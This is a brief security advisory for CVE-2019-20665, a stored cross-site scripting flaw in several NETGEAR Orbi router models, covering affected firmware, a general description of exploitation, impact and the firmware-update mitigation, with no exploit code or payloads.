CVE-2019-20665

Vulnerability

A stored cross-site scripting (XSS) vulnerability exists in the web interface of certain NETGEAR Orbi WiFi system models. Affected devices include the RBR20, RBS20, and RBK20 running firmware versions prior to 2.3.5.26, as well as the RBR40, RBS40, RBK40, RBR50, RBS50, and RBK50 running firmware versions prior to 2.3.5.30 [1]. The vulnerability is triggered when a user accesses a stored page or setting containing injected malicious script.

Exploitation

An attacker with access to the device's web interface—potentially through a compromised administrator session or by tricking an authenticated user—can inject a malicious script into a stored field (e.g., device name or other configuration parameter). The script then automatically executes when an administrator or other user views the affected page [1]. No additional authentication beyond the stored session is required for the script to fire.

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the web interface, leading to potential theft of session cookies, modification of device settings, or further attacks within the local network. The impact is limited to actions the authenticated user can perform; however, because the script runs in the browser of an administrative user, it can compromise the management functionality of the device [1].

Mitigation

NETGEAR has released fixed firmware versions: 2.3.5.26 for RBR20, RBS20, and RBK20; and 2.3.5.30 for RBR40, RBS40, RBK40, RBR50, RBS50, and RBK50 [1]. Users should update their devices to these or later firmware versions immediately. No workarounds are provided; the only mitigation is to apply the firmware update [1].